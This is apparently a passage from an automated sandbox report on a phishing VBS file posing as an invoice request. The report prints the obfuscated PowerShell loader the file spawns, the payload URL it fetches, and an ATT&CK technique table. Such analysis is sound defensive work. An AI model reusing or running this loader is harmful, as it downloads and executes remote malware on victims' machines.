              Source: powershell.exe, 00000004.00000002.1709066822.000001DEA1F03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33a
              Source: wscript.exe, 00000001.00000003.1562168681.000001B470CF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000001.00000002.1564512829.000001B46EE10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\H
              Source: wscript.exe, 00000001.00000003.1554978924.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1564751206.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562288428.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1563308658.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562837364.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555850954.000001B470CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1554396735.000001B470CA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000001.00000003.1555385159.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1555506674.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1564546519.000001B46EE62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1562049493.000001B46EE62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: PING.EXE, 00000002.00000002.1559774709.000001A59FC59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0311D518 LdrInitializeThunk,LdrInitializeThunk,7_2_0311D518

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi64_7660.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8028, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#inspeaking overpratice hreapparater heteroscian #>;$filibusterous='koordinatvrdiernes';<#panhygrous procurer cantors emeraldine #>;$husklike=$erhvervsaffaldets+$host.ui; function lymnaeid($simonize){if ($husklike) {$methodisty++;}$minimumstermometeret=$knaster+$simonize.'length'-$methodisty; for( $pales=4;$pales -lt $minimumstermometeret;$pales+=5){$postcardinal=$pales;$dekompressionen+=$simonize[$pales];$underbreeding='helstegte';}$dekompressionen;}function orfrays($advolution){ .($landbetjents) ($advolution);}$originate=lymnaeid 'unsumantiokampzblegi r,nlberelhobbaco p/ run ';$originate+=lymnaeid 'fors5kjel.thom0f,rb nama(kaprw unfino onduelds,jdolagowmil,sobsc sixpn undtpoly skri1 dyb0rigs.toko0scia;unde bullwunpri indnnont6 res4soci;lind aminxblya6hngs4met.;rlin caprfolkvlizz:egoi1tand3fest1anta. .al0 fi )cl.p jogg yrkedecoc.orbkg.aso fej/ kir2skil0erek1 ob0 c,n0myon1prod0ddss1acqu pumfat,li .lorindiehus fdeloo im,xbena/tha 1colo3s ip1pap . git0 tre ';$vgtighedens=lymnaeid 'erh.u bous d fe currunbl-parka p,pgstate axnbibltfore ';$adaptively=lymnaeid ' trh bist cont an pfares b,l:agen/rund/kvalodeforc ratstabhbrulove bibo,smoutspsolfl.kdea baansnontdeckcbuc esokknverdt u,eenondrfire.arkarnldeotech/carbbpageeb.rtsslabtdobbypolir heleun.etbed,.squaomirkc uncximcn ';$reformbevgelser=lymnaeid 'pre,>r,ma ';$landbetjents=lymnaeid 'ma ci,atoe impxs.rv ';$befolk='lousin';$vitalizings='\kinetoplast.liq';orfrays (lymnaeid 'patr$brysgunpol so okronb upsas ikllulu: icho pr.du,nai sy salloekatarprecelevi=rede$do re salnklikvchef:lynnama opfluops msdkamea,nddte erapyro+foto$ vr.vnadvi opht ilma letl ,idisubtzbawdidy en re gmilksbr.t ');orfrays (lymnaeid ' s r$af rg,pspldr,aoopfobco ca undlte r:hyp.dhun.o,rembunspbnar enamel maht hiehunchenedsdupererabarfossn loge a bssham= r c$di kalyttddratatiggp deittvaniscanvd maerom l,odsyanan.megastradpb dqludgiiune.t j n(tr a$srnur eaueangef fo.ogradr velmest,b iledatav gu.gretoec.njlphanssjlee tonr ecd)g ln ');orfrays (lymnaeid ' svm[hespneukle bnethest.backsf dsepolyrvic vconsikultcendue egipkonkogrypismaanaaret rhymkulmagennnanala l agm,skekonfrairm] lux: d.k:nonms di.eoverc oveudisprcaviiactutjuryybygnprin,rgrimom.eatopdaoduoechudiomanilun n farv=e,te brug[ undntungerigstsky .bilcsr goe attcsw,eukorrrcaphi kikt andynavnpblokrek io armt amaoo,nocspooou,trl ma.tc viy.rogpmyste u y]hal :chin:alahtem,il encsdepe1udda2az m ');$adaptively=$dobbelthedernes[0];$udbyttebehandling=(lymnaeid ' lea$drilgpneulhoteobenebsem.andeslpyic:pulig kniydiscm f gnsk mafamiskvisithigud.ntmsimu=brugnpelee.abow imr-unsooak ibpolij,dpoetolvcs ritagro asmassk iymastsnonotimpeequo msu c.antinimprekabutpaa,. bygwvandesligboutpcind lboliidiasegramn afftbe,i ');orfrays ($udbyttebehandling);orfrays (lymnaeid 'vu g$revog nimy jagmrykkndiglachrisaktii wroutra msa,o.af.eh oopeenroaostrd mone storartis cle[hand$typev eksgns
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#inspeaking overpratice hreapparater heteroscian #>;$filibusterous='koordinatvrdiernes';<#panhygrous procurer cantors emeraldine #>;$husklike=$erhvervsaffaldets+$host.ui; function lymnaeid($simonize){if ($husklike) {$methodisty++;}$minimumstermometeret=$knaster+$simonize.'length'-$methodisty; for( $pales=4;$pales -lt $minimumstermometeret;$pales+=5){$postcardinal=$pales;$dekompressionen+=$simonize[$pales];$underbreeding='helstegte';}$dekompressionen;}function orfrays($advolution){ .($landbetjents) ($advolution);}$originate=lymnaeid 'unsumantiokampzblegi r,nlberelhobbaco p/ run ';$originate+=lymnaeid 'fors5kjel.thom0f,rb nama(kaprw unfino onduelds,jdolagowmil,sobsc sixpn undtpoly skri1 dyb0rigs.toko0scia;unde bullwunpri indnnont6 res4soci;lind aminxblya6hngs4met.;rlin caprfolkvlizz:egoi1tand3fest1anta. .al0 fi )cl.p jogg yrkedecoc.orbkg.aso fej/ kir2skil0erek1 ob0 c,n0myon1prod0ddss1acqu pumfat,li .lorindiehus fdeloo im,xbena/tha 1colo3s ip1pap . git0 tre ';$vgtighedens=lymnaeid 'erh.u bous d fe currunbl-parka p,pgstate axnbibltfore ';$adaptively=lymnaeid ' trh bist cont an pfares b,l:agen/rund/kvalodeforc ratstabhbrulove bibo,smoutspsolfl.kdea baansnontdeckcbuc esokknverdt u,eenondrfire.arkarnldeotech/carbbpageeb.rtsslabtdobbypolir heleun.etbed,.squaomirkc uncximcn ';$reformbevgelser=lymnaeid 'pre,>r,ma ';$landbetjents=lymnaeid 'ma ci,atoe impxs.rv ';$befolk='lousin';$vitalizings='\kinetoplast.liq';orfrays (lymnaeid 'patr$brysgunpol so okronb upsas ikllulu: icho pr.du,nai sy salloekatarprecelevi=rede$do re salnklikvchef:lynnama opfluops msdkamea,nddte erapyro+foto$ vr.vnadvi opht ilma letl ,idisubtzbawdidy en re gmilksbr.t ');orfrays (lymnaeid ' s r$af rg,pspldr,aoopfobco ca undlte r:hyp.dhun.o,rembunspbnar enamel maht hiehunchenedsdupererabarfossn loge a bssham= r c$di kalyttddratatiggp deittvaniscanvd maerom l,odsyanan.megastradpb dqludgiiune.t j n(tr a$srnur eaueangef fo.ogradr velmest,b iledatav gu.gretoec.njlphanssjlee tonr ecd)g ln ');orfrays (lymnaeid ' svm[hespneukle bnethest.backsf dsepolyrvic vconsikultcendue egipkonkogrypismaanaaret rhymkulmagennnanala l agm,skekonfrairm] lux: d.k:nonms di.eoverc oveudisprcaviiactutjuryybygnprin,rgrimom.eatopdaoduoechudiomanilun n farv=e,te brug[ undntungerigstsky .bilcsr goe attcsw,eukorrrcaphi kikt andynavnpblokrek io armt amaoo,nocspooou,trl ma.tc viy.rogpmyste u y]hal :chin:alahtem,il encsdepe1udda2az m ');$adaptively=$dobbelthedernes[0];$udbyttebehandling=(lymnaeid ' lea$drilgpneulhoteobenebsem.andeslpyic:pulig kniydiscm f gnsk mafamiskvisithigud.ntmsimu=brugnpelee.abow imr-unsooak ibpolij,dpoetolvcs ritagro asmassk iymastsnonotimpeequo msu c.antinimprekabutpaa,. bygwvandesligboutpcind lboliidiasegramn afftbe,i ');orfrays ($udbyttebehandling);orfrays (lymnaeid 'vu g$revog nimy jagmrykkndiglachrisaktii wroutra msa,o.af.eh oopeenroaostrd mone storartis cle[hand$typev eksgns
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#inspeaking overpratice hreapparater heteroscian #>;$filibusterous='koordinatvrdiernes';<#panhygrous procurer cantors emeraldine #>;$husklike=$erhvervsaffaldets+$host.ui; function lymnaeid($simonize){if ($husklike) {$methodisty++;}$minimumstermometeret=$knaster+$simonize.'length'-$methodisty; for( $pales=4;$pales -lt $minimumstermometeret;$pales+=5){$postcardinal=$pales;$dekompressionen+=$simonize[$pales];$underbreeding='helstegte';}$dekompressionen;}function orfrays($advolution){ .($landbetjents) ($advolution);}$originate=lymnaeid 'unsumantiokampzblegi r,nlberelhobbaco p/ run ';$originate+=lymnaeid 'fors5kjel.thom0f,rb nama(kaprw unfino onduelds,jdolagowmil,sobsc sixpn undtpoly skri1 dyb0rigs.toko0scia;unde bullwunpri indnnont6 res4soci;lind aminxblya6hngs4met.;rlin caprfolkvlizz:egoi1tand3fest1anta. .al0 fi )cl.p jogg yrkedecoc.orbkg.aso fej/ kir2skil0erek1 ob0 c,n0myon1prod0ddss1acqu pumfat,li .lorindiehus fdeloo im,xbena/tha 1colo3s ip1pap . git0 tre ';$vgtighedens=lymnaeid 'erh.u bous d fe currunbl-parka p,pgstate axnbibltfore ';$adaptively=lymnaeid ' trh bist cont an pfares b,l:agen/rund/kvalodeforc ratstabhbrulove bibo,smoutspsolfl.kdea baansnontdeckcbuc esokknverdt u,eenondrfire.arkarnldeotech/carbbpageeb.rtsslabtdobbypolir heleun.etbed,.squaomirkc uncximcn ';$reformbevgelser=lymnaeid 'pre,>r,ma ';$landbetjents=lymnaeid 'ma ci,atoe impxs.rv ';$befolk='lousin';$vitalizings='\kinetoplast.liq';orfrays (lymnaeid 'patr$brysgunpol so okronb upsas ikllulu: icho pr.du,nai sy salloekatarprecelevi=rede$do re salnklikvchef:lynnama opfluops msdkamea,nddte erapyro+foto$ vr.vnadvi opht ilma letl ,idisubtzbawdidy en re gmilksbr.t ');orfrays (lymnaeid ' s r$af rg,pspldr,aoopfobco ca undlte r:hyp.dhun.o,rembunspbnar enamel maht hiehunchenedsdupererabarfossn loge a bssham= r c$di kalyttddratatiggp deittvaniscanvd maerom l,odsyanan.megastradpb dqludgiiune.t j n(tr a$srnur eaueangef fo.ogradr velmest,b iledatav gu.gretoec.njlphanssjlee tonr ecd)g ln ');orfrays (lymnaeid ' svm[hespneukle bnethest.backsf dsepolyrvic vconsikultcendue egipkonkogrypismaanaaret rhymkulmagennnanala l agm,skekonfrairm] lux: d.k:nonms di.eoverc oveudisprcaviiactutjuryybygnprin,rgrimom.eatopdaoduoechudiomanilun n farv=e,te brug[ undntungerigstsky .bilcsr goe attcsw,eukorrrcaphi kikt andynavnpblokrek io armt amaoo,nocspooou,trl ma.tc viy.rogpmyste u y]hal :chin:alahtem,il encsdepe1udda2az m ');$adaptively=$dobbelthedernes[0];$udbyttebehandling=(lymnaeid ' lea$drilgpneulhoteobenebsem.andeslpyic:pulig kniydiscm f gnsk mafamiskvisithigud.ntmsimu=brugnpelee.abow imr-unsooak ibpolij,dpoetolvcs ritagro asmassk iymastsnonotimpeequo msu c.antinimprekabutpaa,. bygwvandesligboutpcind lboliidiasegramn afftbe,i ');orfrays ($udbyttebehandling);orfrays (lymnaeid 'vu g$revog nimy jagmrykkndiglachrisaktii wroutra msa,o.af.eh oopeenroaostrd mone storartis cle[hand$typev eksgnsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              11
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)11
              Process Injection
              Security Account Manager21
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Remote System Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              System Network Configuration Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
              System Information Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                unknown
                orthoimplantcenter.ro
                188.241.183.45
                truefalse
                  unknown
                  gormezl_6777.6777.6777.677e
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://orthoimplantcenter.ro/Bestyret.ocxfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2850277699.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.micropowershell.exe, 00000007.00000002.2864093210.0000000008570000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://aka.ms/pscore6lB_qpowershell.exe, 00000007.00000002.2833765979.0000000004D71000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://orthoimplantcenter.ropowershell.exe, 00000004.00000002.1684347363.000001DE89B78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684347363.000001DE8B300000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.2833765979.0000000004EC7000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://go.micropowershell.exe, 00000004.00000002.1684347363.000001DE8AD57000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
